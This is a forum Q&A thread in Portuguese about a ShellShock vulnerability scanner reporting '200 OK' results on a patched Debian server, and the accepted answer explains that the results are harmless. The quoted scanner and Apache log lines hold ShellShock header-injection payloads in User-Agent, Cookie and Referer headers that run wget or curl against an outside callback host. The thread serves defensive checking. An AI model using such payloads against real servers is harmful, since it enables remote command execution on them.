O teste ShellShock mostra o acesso wget e curl

Question

O teste ShellShock mostra o acesso wget e curl

#1 resposta do (0 votos)

2

Eu consertei o bug do shellshock no meu servidor Debian 6 e, durante o teste no link , recebi a mensagem "Nenhuma vulnerabilidade encontrada" e está tudo bem mas eles também verificam outras coisas e no log de teste eu recebo:

URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
...
...
...

"200 OK" está tudo bem? 200 significa acessível. Eu marquei alguns outros domínios e alguns deles mostram também "200 OK", mas outros mostram "Erro".

Pode ficar assim ou devo corrigir isso? Se sim, como posso fazer isso?

wget curl shell http-status-code

por Odin 22.10.2014 / 10:48

1 resposta

Tags wget curl shell http-status-code

HowTo impor SHA512 no Outlook 2010 (e acima) para S / Mime? IP não local para o próximo salto no roteamento

score 0 · Accepted Answer

Eu verifiquei isso no meu site, você não precisa se preocupar.

Este site faz alguns testes em / , eles não chamam um script cgi específico. E isso resulta em um 200 OK, não importa o que o referenciador passado ou o user agent esteja tentando explorar.

Este é um exemplo do que meu log do apache mostra:

75.127.84.182 - - [22/Oct/2014:11:52:54 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-wget'" "-"
75.127.84.182 - - [22/Oct/2014:11:52:55 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-curl'" "-"